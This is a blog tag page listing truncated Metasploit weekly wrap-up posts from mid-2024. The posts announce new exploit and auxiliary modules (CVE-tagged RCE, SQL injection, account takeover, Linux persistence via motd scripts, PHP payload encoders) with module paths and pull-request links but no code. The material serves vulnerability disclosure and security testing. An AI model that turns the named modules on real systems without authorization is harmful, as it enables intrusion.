Posts tagged Metasploit

2 min Metasploit

Metasploit Weekly Wrap-Up 10/04/2024

New module content (3) cups-browsed Information Disclosure Authors: bcoles and evilsocket Type: Auxiliary Pull request: #19510 [https://github.com/rapid7/metasploit-framework/pull/19510] contributed by bcoles [https://github.com/bcoles] Path: scanner/misc/cups_browsed_info_disclosure Description: Adds scanner module to retrieve CUPS version and kernel version information from cups-browsed services. Acronis Cyber Infrastructure default password remote code execution Authors: Acronis Internatio

3 min Metasploit

Metasploit Weekly Wrap-Up 09/27/2024

Epic Release! This week's release includes 5 new modules, 6 enhancements, 4 fixes and 1 documentation update. Among the new additions, we have an account take over, SQL injection, RCE, and LPE! Thank you to all the contributors who made it possible! New Module Content (5) Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Authors: Michael Heinzl and Mohammed Adel Type: Auxiliary Pull request: #19375 [https://github.com/rapid7/metasploit-framework/pull/19375] contribut

2 min Metasploit

Metasploit Weekly Wrap-Up 09/20/2024

New module content (3) update-motd.d Persistence Author: Julien Voisin Type: Exploit Pull request: #19454 [https://github.com/rapid7/metasploit-framework/pull/19454] contributed by jvoisin [https://github.com/jvoisin] Path: linux/local/motd_persistence Description: This adds a post module to keep persistence on a Linux target by writing a motd [https://manpages.ubuntu.com/manpages/trusty/man5/update-motd.5.html] bash script triggered with root privileges every time a user logs into the system

2 min Metasploit

Metasploit Weekly Wrap-Up 09/13/2024

SPIP Modules This week brings more modules targeting the SPIP publishing platform. SPIP has gained some attention from Metasploit community contributors recently and has inspired some PHP payload and encoder improvements. New module content (2) SPIP BigUp Plugin Unauthenticated RCE Authors: Julien Voisin, Laluka, Valentin Lobstein, and Vozec Type: Exploit Pull request: #19444 [https://github.com/rapid7/metasploit-framework/pull/19444] contributed by Chocapikk [https://github.com/Chocapikk] Pat

2 min Metasploit

Metasploit Weekly Wrap-Up 09/06/2024

Honey, I shrunk the PHP payloads This release contains more PHP payload improvements from Julien Voisin. Last week we landed a PR from Julien that added a datastore option to the php/base64 encoder that when enabled, will use zlib to compress the payload which significantly reduced the size, bringing a payload of 4040 bytes down to a mere 1617 bytes. This week's release includes a php/minify encoder which removes all unnecessary characters from the payload including comments, empty lines, leadin

4 min Metasploit

Metasploit Weekly Wrap-Up 08/30/2024

A New Way to Encode PHP Payloads A new PHP encoder has been released by a community contributor, jvoisin [https://github.com/jvoisin], allowing a PHP payload to be encoded as an ASCII-Hex string. This can then be decoded on the receiver to prevent issues with unescaped or bad characters. Ray Vulnerabilities This release of Metasploit Framework also features 3 new modules to target ray.io, which is a framework for distributing AI-related workloads across multiple machines, which makes it an exce

1 min Metasploit

Metasploit Weekly Wrap-Up 08/23/2024

New module content (3) Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276) Authors: Michael Heinzl and Tenable Type: Auxiliary Pull request: #19373 [https://github.com/rapid7/metasploit-framework/pull/19373] contributed by h4x-x0r [https://github.com/h4x-x0r] Path: admin/http/fortra_filecatalyst_workflow_sqli AttackerKB reference: CVE-2024-5276 [https://attackerkb.com/search?q=CVE-2024-5276&referrer=blog] Description: This adds an auxiliary module to exploit the CVE-2024-5276, a SQL inj

2 min Metasploit

Metasploit Weekly Wrap-Up 08/16/2024

New module content (3) Apache HugeGraph Gremlin RCE Authors: 6right and jheysel-r7 Type: Exploit Pull request: #19348 [https://github.com/rapid7/metasploit-framework/pull/19348] contributed by jheysel-r7 [https://github.com/jheysel-r7] Path: linux/http/apache_hugegraph_gremlin_rce AttackerKB reference: CVE-2024-27348 [https://attackerkb.com/search?q=CVE-2024-27348&referrer=blog] Description: Adds an Apache HugeGraph Server exploit for GHSA-29rc-vq7f-x335 [https://github.com/advisories/GHSA-29r

1 min Metasploit

Metasploit Weekly Wrap-Up 08/09/2024

Black Hat & DEF CON Hopefully folks were able to catch our Rapid7 researchers @zeroSteiner [https://x.com/zeroSteiner] & Jack Heysel show off the Metasploit 6.4's features, focusing on combinations that allow for new, streamlined attack workflows at Black Hat. If not they will also be demoing at DEF CON tomorrow in room W304! New module content (1) Calibre Python Code Injection (CVE-2024-6782) Authors: Amos Ng and Michael Heinzl Type: Exploit Pull request: #19357 [https://github.com/rapid7/meta

2 min Metasploit

Metasploit Weekly Wrap-Up 08/02/2024

Metasploit goes to Hacker Summer Camp Next week, Metasploit will have demos at both Black Hat [https://www.blackhat.com/us-24/arsenal/schedule/index.html#the-metasploit-framework-39570] and DEF CON [https://defcon.org/html/defcon-32/dc-32-demolabs.html#54186] where the latest functionality from this year will be presented. The Black Hat demo will be on Thursday the 8th from 10:10 to 11:25 and the DEF CON demo will be on Saturday the 10th from 12:00 to 13:45. The highlights will include demonst

2 min Metasploit

Metasploit Weekly Wrap-Up 07/26/2024

New module content (3) Magento XXE Unserialize Arbitrary File Read Authors: Heyder and Sergey Temnikov Type: Auxiliary Pull request: #19304 [https://github.com/rapid7/metasploit-framework/pull/19304] contributed by heyder [https://github.com/heyder] Path: gather/magento_xxe_cve_2024_34102 AttackerKB reference: CVE-2024-34102 [https://attackerkb.com/search?q=CVE-2024-34102&referrer=blog] Description: This adds an auxiliary module for an XXE which results in an arbitrary file in Magento which is

2 min Metasploit Weekly Wrapup

Metasploit Weekly Wrap-Up 7/19/2024

A new unauthenticated RCE exploit for GeoServer, plus library and Meterpreter updates and enhancements.

2 min Metasploit

Metasploit Weekly Wrap-Up 07/12/2024

The Usual Suspects This release features two new exploits targeting old friends: Confluence and Ivanti. CVE-2024-21683 [https://attackerkb.com/search?q=CVE-2024-21683&referrer=blog] is a very easy vulnerability to exploit, but as pointed out in the AttackerKB Review [https://attackerkb.com/assessments/5ad314a1-9fd7-47d7-835f-f29680b3961d?referrer=blog] , it requires authentication as a ‘Confluence Administrator.’ On the other hand, CVE-2024-29824 is an unauthenticated SQL Injection in Ivanti End

2 min Metasploit

Metasploit Weekly Wrap-Up 07/05/2024

3 new modules - MOVEit Transfer authentication bypass CVE-2024-5806, Zyxel command injection, and Azure CLI credentials gatherer

2 min Metasploit

Metasploit Weekly Wrap-Up 06/28/2024

Unauthenticated Command Injection in Netis Router This week's Metasploit release includes an exploit module for an unauthenticated command injection vulnerability in the Netis MW5360 router which is being tracked as CVE-2024-22729. The vulnerability stems from improper handling of the password parameter within the router's web interface which allows for command injection. Fortunately for attackers, the router's login page authorization can be bypassed by simply deleting the authorization header,